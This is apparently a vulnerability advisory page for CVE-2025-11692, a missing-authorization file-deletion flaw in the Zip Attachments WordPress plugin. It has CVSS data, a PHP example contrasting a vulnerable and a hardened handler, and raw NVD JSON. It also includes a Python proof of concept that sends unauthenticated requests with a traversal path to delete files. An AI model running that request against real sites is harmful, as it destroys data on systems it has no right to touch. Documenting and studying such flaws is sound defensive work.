Security Vulnerability Report
CVE-2025-11692 (CVSS 5.3 MEDIUM)

Published: 2025-10-15 09:15:43
Last Modified: 2026-04-15 00:35:42

Description

The Zip Attachments plugin for WordPress is vulnerable to unauthorized loss of data due to missing authorization and capability checks on the download.php file in all versions up to, and including, 1.6. This makes it possible for unauthenticated attackers to delete arbitrary files from the current wp_upload_dir directory. The weakness is classified as CWE-862 (Missing Authorization); the CVSS vector below records that no privileges or user interaction are required (PR:N, UI:N) and that the impact is limited to integrity (I:L) with no confidentiality or availability impact.
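The advisory describes a CWE-862 pattern: a request handler that acts on a file path taken from the request without checking who is asking. The following is an added illustration of that pattern beside a hardened version written against the WordPress API. It is not the Zip Attachments plugin's download.php and is not derived from it; the function names (za_delete_upload_vulnerable, za_delete_upload_hardened), the `file` request parameter, the nonce action `za_delete_upload` and the `delete_posts` capability are all assumptions chosen for this example.

```php
<?php
/*
 * Added example of the CWE-862 pattern in a WordPress "delete uploaded file"
 * handler and one way to fix it. Not the Zip Attachments plugin's code; every
 * name below (function names, the 'file' parameter, the nonce action and the
 * capability) is an assumption for illustration.
 */

// Vulnerable shape: the file named in the request is unlinked with no
// authentication, capability or nonce check. Anyone who can reach the
// endpoint can delete anything that resolves under the uploads directory.
function za_delete_upload_vulnerable() {
    $upload = wp_upload_dir();
    $file   = $upload['basedir'] . '/' . $_REQUEST['file'];
    if ( file_exists( $file ) ) {
        unlink( $file );
    }
}

// Hardened shape: require a logged-in user holding an explicit capability,
// a nonce bound to this specific action, and a target that resolves inside
// the uploads base directory after symlinks and "../" are collapsed.
function za_delete_upload_hardened() {
    if ( ! is_user_logged_in() || ! current_user_can( 'delete_posts' ) ) {
        wp_die( 'Forbidden', '', array( 'response' => 403 ) );
    }
    // Dies with a 403 if the nonce is missing or does not match the action.
    check_admin_referer( 'za_delete_upload' );

    $upload  = wp_upload_dir();
    $basedir = realpath( $upload['basedir'] );
    $name    = isset( $_REQUEST['file'] ) ? wp_unslash( $_REQUEST['file'] ) : '';
    $target  = realpath( $basedir . '/' . $name );

    // realpath() returns false for non-existent paths and normalises traversal,
    // so a prefix check against basedir is a real containment test.
    if ( false === $target || strpos( $target, $basedir . DIRECTORY_SEPARATOR ) !== 0 ) {
        wp_die( 'Invalid file', '', array( 'response' => 400 ) );
    }

    // wp_delete_file() runs the 'wp_delete_file' filter before unlinking,
    // so other code can veto or log the deletion.
    wp_delete_file( $target );
}
```

A file under wp-content/plugins/ that is requested directly, as download.php is here, only has these WordPress functions available if it bootstraps the core via wp-load.php. The more robust design is to drop the standalone entry point entirely and expose the action through admin-ajax.php or a REST route with a permission_callback, so that the capability check is part of the route registration rather than something each handler has to remember.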

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

NVD lists no CPE configuration for this entry. Affected product, per the description:

Zip Attachments Plugin <= 1.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-11692 PoC - Zip Attachments Plugin Arbitrary File Deletion
# Vulnerability: Missing authorization in download.php
# Affected: Zip Attachments Plugin <= 1.6
import requests

# Target WordPress site (placeholder)
target_url = "http://target-wordpress-site.com"

# Path to the vulnerable download.php file, reachable without logging in
vulnerable_endpoint = "/wp-content/plugins/zip-attachments/download.php"

# File to delete, relative to wp_upload_dir. The advisory only describes
# deletion of files inside wp_upload_dir; whether traversal out of it works
# is not stated, so treat this value as an untested example.
file_to_delete = "../../test.txt"

# Request parameters. The "file" and "action" names are assumptions made by
# this PoC, not parameters confirmed by the advisory (see the note at the end).
params = {
    "file": file_to_delete,
    "action": "delete",  # presumed action that triggers deletion
}

# Send the request without any authentication cookie or nonce
response = requests.get(
    target_url + vulnerable_endpoint,
    params=params,
    verify=False,
    timeout=10,
)
print(f"Status Code: {response.status_code}")
print(f"Response: {response.text}")

# Alternative: POST request variant with the same parameters
response_post = requests.post(
    target_url + vulnerable_endpoint,
    data=params,
    verify=False,
    timeout=10,
)
print(f"POST Status Code: {response_post.status_code}")
print(f"POST Response: {response_post.text}")

# Note: the exact parameter names are not stated in the advisory and may vary
# by plugin version. Read download.php at tag 1.6 (linked under References)
# to confirm which parameters reach the file-deletion code path.
```

References

https://plugins.trac.wordpress.org/browser/zip-attachments/tags/1.6/download.php#L27 (plugin source at tag 1.6, download.php, the line the advisory points to)
https://www.wordfence.com/threat-intel/vulnerabilities/id/aa8d746f-82e2-4615-92bb-35d20124dc56?source=cve (Wordfence advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-11692",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-15T09:15:42.720",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Zip Attachments plugin for WordPress is vulnerable to unauthorized loss of data due to a missing authorization and capability checks on the download.php file in all versions up to, and including, 1.6. This makes it possible for unauthenticated attackers to delete arbitrary files from the current wp_upload_dir directory."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-862"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/zip-attachments/tags/1.6/download.php#L27",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/aa8d746f-82e2-4615-92bb-35d20124dc56?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```